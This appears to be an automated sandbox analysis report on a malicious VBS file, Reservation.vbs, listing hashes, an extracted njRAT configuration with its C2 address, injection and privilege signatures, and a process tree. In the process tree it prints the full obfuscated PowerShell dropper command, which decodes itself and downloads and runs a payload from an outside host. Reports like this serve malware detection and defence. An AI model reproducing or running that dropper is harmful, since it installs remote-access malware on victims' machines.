Analysis
- max time kernel: 150s
- max time network: 138s
- platform: windows10_x64
- resource: win10-en
- submitted: 05-09-2021 21:15
Static task: static1
Behavioral task: behavioral1
Sample: Reservation.vbs
Resource: win7-en (windows7_x64)
0 signatures
0 seconds
General
- Target: Reservation.vbs
- Size: 1KB
- MD5: d1105a626de00b3a3d248febfe9d2eab
- SHA1: f088bdfa3f5d251f325ff4b11b5e680425c25ba2
- SHA256: c61844d30e92c490359ae221d04620767e303247345e12de34f8ae43eb1cf26b
- SHA512: 11378362541f0656af2bc775cfd4b8e23e9c9a08cd9eb8b35109f3553da2e870a9c376efd3df2039c4c8224c70ba54ff0cad0030751bdfb8641da4f639e0bc16
Malware Config
Extracted
- Language: ps1
- Deobfuscated
- URLs (exe.dropper): http://54.184.87.30/bypass.txt
Extracted
- Family: njrat
- Version: v4.0
- Botnet: Boss
- C2: 103.147.184.73:7103
- Mutex: Windows
Attributes
- reg_key: Windows
- splitter: |-F-|
Signatures
-
Blocklisted process makes network request (2 IoCs)
Processes:
  flow  pid   process
  7     1580  powershell.exe
  17    1580  powershell.exe
-
Suspicious use of SetThreadContext (1 IoC)
Processes:
  description                          pid   process         target process
  PID 1580 set thread context of 1116  1580  powershell.exe  aspnet_compiler.exe
-
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses (3 IoCs)
Processes:
  pid   process
  1580  powershell.exe
  1580  powershell.exe
  1580  powershell.exe
-
Suspicious use of AdjustPrivilegeToken (30 IoCs)
Processes:
  description                        pid   process
  Token: SeDebugPrivilege            1580  powershell.exe
  Token: SeDebugPrivilege            1116  aspnet_compiler.exe
  Token: 33                          1116  aspnet_compiler.exe
  Token: SeIncBasePriorityPrivilege  1116  aspnet_compiler.exe
  (the last two entries alternate, 14 times each, for 30 entries in total)
-
Suspicious use of WriteProcessMemory (10 IoCs)
Processes:
  description                       pid   process         target process
  PID 4000 wrote to memory of 1580  4000  WScript.exe     powershell.exe        (2 entries)
  PID 1580 wrote to memory of 1116  1580  powershell.exe  aspnet_compiler.exe   (8 entries)
Processes
-
C:\Windows\System32\WScript.exe (process tree depth 1)
Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Reservation.vbs"
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (process tree depth 2)
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $TRUMP ='http://54XXX184XXX87XXX30/bypassXXXtxt'.Replace('XXX','.');$Shib='24=42=20=3d=27=45=54=48=20=43=4f=49=4e=74=2e=57=54=46=20=43=4f=49=4e=6c=49=4f=53=4e=54=27=2e=52=65=70=6c=61=63=65=28=27=45=54=48=20=43=4f=49=4e=27=2c=27=6e=45=27=29=2e=52=65=70=6c=61=63=65=28=27=54=46=20=43=4f=49=4e=27=2c=27=45=62=43=27=29=2e=52=65=70=6c=61=63=65=28=27=4f=53=27=2c=27=65=27=29=3b=24=43=43=20=3d=20=27=44=4f=53=20=43=4f=49=4e=20=4c=53=4f=53=43=4f=49=4e=6e=47=27=2e=52=65=70=6c=61=63=65=28=27=53=20=43=4f=49=4e=20=27=2c=27=57=6e=27=29=2e=52=65=70=6c=61=63=65=28=27=53=4f=27=2c=27=6f=61=44=27=29=2e=52=65=70=6c=61=63=65=28=27=43=4f=49=4e=27=2c=27=54=72=49=27=29=3b=24=41=20=3d=27=49=60=45=6f=73=20=43=4f=49=4e=60=57=60=42=54=43=20=43=4f=49=4e=6a=60=45=54=48=20=43=4f=49=4e=20=24=42=29=2e=24=43=43=28=24=54=52=55=4d=50=29=27=2e=52=65=70=6c=61=63=65=28=27=6f=73=20=43=4f=49=4e=27=2c=27=58=28=6e=60=65=27=29=2e=52=65=70=6c=61=63=65=28=27=42=54=43=20=43=4f=49=4e=27=2c=27=2d=4f=62=27=29=2e=52=65=70=6c=61=63=65=28=27=54=48=20=43=4f=49=4e=27=2c=27=60=63=60=54=27=29=3b=26=28=27=49=27=2b=27=45=58=27=29=28=24=41=20=2d=4a=6f=69=6e=20=27=27=29=7c=26=28=27=49=27=2b=27=45=58=27=29=3b';Invoke-Expression (-join ($Shib -split '=' | ? { $_ } | % { [char][convert]::ToUInt32($_,16) }))
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe (process tree depth 3)
Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads